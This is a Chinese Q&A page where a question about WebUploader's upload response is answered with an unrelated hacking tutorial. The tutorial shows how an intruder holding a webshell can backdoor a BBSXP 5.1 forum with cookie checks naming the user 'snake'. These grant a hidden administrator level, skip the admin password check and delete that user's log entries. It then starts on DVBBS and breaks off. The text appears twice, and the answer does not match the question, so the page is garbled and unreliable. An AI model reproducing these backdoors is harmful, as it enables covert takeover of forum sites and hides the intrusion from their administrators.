为什么webuploader的uploadsuccess执行后拿到response的值为错误信息
1个回答
展开全部
目标:通过Webshell对原文件的修改使自己变成管理员,常规情况下不会被管理员发现。
目的:方便大家,其实懂一点点asp的人都会,不过自己试,费的时间比较多。
在拿到webshell的情况下如何控制论坛呢
这个问题好像有点多余。一般都是从论坛弄webshell,怎么会出现这种情况呢?现在的论坛做的越来越安全,在新漏洞发现之前,最新版本的论坛一般很难攻克。但是一个网站总有软肋,在菜鸟圈里很火的注入、上传漏洞,还有旁注等等都可以让我们拿到Webshell。
许多人都会问,有webshell了还怕论坛下不来?改数据就可以了。但是这样问题就来了,admin没事突然发现多了个管理员帐户,你说他怎么想?说不定来个大清查。(没准把我们的webshell也揪出来)
既然我们有了webshell,那何不在论坛上做做手脚?
1. bbsxp。
版本:偶以5.1说明
(1)成为前台Master
新建include.asp,内容如下:
〈%
if Request.Cookies("username")="snake" then
membercode=5
end if
%〉
在setup.asp尾部添加如下代码:
〈!-- #include file="include.asp" --〉
一定要是在尾部,如果添加在头部,那么membercode又会被还原成原来的值。
这样,你就可以成为一个"隐身"管理员了.
(2). 成为后台Master
在admin.asp里看到sub(pass)的这里(53行):
session("pass")=md5(""&Request("pass")&"")
if adminpassword〈〉session("pass") then error2("社区管理密码错误")
这个就是后台密码验证,我们改改:
if Request.Cookies("username")〈〉"snake" then
session("pass")=md5(""&Request("pass")&"")
if adminpassword〈〉session("pass") then error2("社区管理密码错误")
end if
小结一下,如果你有webshell,那就不要读数据库了,打开文件,把你不满意的密码验证都加上IF语句。控制好条件,等到你登陆后,这些验证就......
再加上这样一段:
If Request.Cookies(“username”)=”snake” then
Session(“pass”)= adminpassword
End if
怎么样,进入后台随便输入一个密码。OK!进去了。
虽然别人从正常渠道看不出来你是master了.但是别忘了bbsxp的日志,既然我们有webshell,那还不好改
在admin.asp中164行可以看到这样一句:
conn.execute("delete from [log] where logtime〈"&SqlNowString&"-7")
这就是日志只保存7天的原因了.我们在其后也来一句:
conn.execute("delete from [log] where ’username’=’snake’")
这样,每次有人登陆后台,我们的操作就Over掉啦.
2. dvbbs.
版本:以7.0 ac说明(菜之至极,手里的鸡都没有7.1,嗨!老天呐!)
(1):成为前台Master
洞网论坛大家应该非常熟悉了吧。它的权限判断是放在/inc/Dv_ClsMain.asp里完成的。得到前台管理员当然要从这里入手了。
目的:方便大家,其实懂一点点asp的人都会,不过自己试,费的时间比较多。
在拿到webshell的情况下如何控制论坛呢
这个问题好像有点多余。一般都是从论坛弄webshell,怎么会出现这种情况呢?现在的论坛做的越来越安全,在新漏洞发现之前,最新版本的论坛一般很难攻克。但是一个网站总有软肋,在菜鸟圈里很火的注入、上传漏洞,还有旁注等等都可以让我们拿到Webshell。
许多人都会问,有webshell了还怕论坛下不来?改数据就可以了。但是这样问题就来了,admin没事突然发现多了个管理员帐户,你说他怎么想?说不定来个大清查。(没准把我们的webshell也揪出来)
既然我们有了webshell,那何不在论坛上做做手脚?
1. bbsxp。
版本:偶以5.1说明
(1)成为前台Master
新建include.asp,内容如下:
〈%
if Request.Cookies("username")="snake" then
membercode=5
end if
%〉
在setup.asp尾部添加如下代码:
〈!-- #include file="include.asp" --〉
一定要是在尾部,如果添加在头部,那么membercode又会被还原成原来的值。
这样,你就可以成为一个"隐身"管理员了.
(2). 成为后台Master
在admin.asp里看到sub(pass)的这里(53行):
session("pass")=md5(""&Request("pass")&"")
if adminpassword〈〉session("pass") then error2("社区管理密码错误")
这个就是后台密码验证,我们改改:
if Request.Cookies("username")〈〉"snake" then
session("pass")=md5(""&Request("pass")&"")
if adminpassword〈〉session("pass") then error2("社区管理密码错误")
end if
小结一下,如果你有webshell,那就不要读数据库了,打开文件,把你不满意的密码验证都加上IF语句。控制好条件,等到你登陆后,这些验证就......
再加上这样一段:
If Request.Cookies(“username”)=”snake” then
Session(“pass”)= adminpassword
End if
怎么样,进入后台随便输入一个密码。OK!进去了。
虽然别人从正常渠道看不出来你是master了.但是别忘了bbsxp的日志,既然我们有webshell,那还不好改
在admin.asp中164行可以看到这样一句:
conn.execute("delete from [log] where logtime〈"&SqlNowString&"-7")
这就是日志只保存7天的原因了.我们在其后也来一句:
conn.execute("delete from [log] where ’username’=’snake’")
这样,每次有人登陆后台,我们的操作就Over掉啦.
2. dvbbs.
版本:以7.0 ac说明(菜之至极,手里的鸡都没有7.1,嗨!老天呐!)
(1):成为前台Master
洞网论坛大家应该非常熟悉了吧。它的权限判断是放在/inc/Dv_ClsMain.asp里完成的。得到前台管理员当然要从这里入手了。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
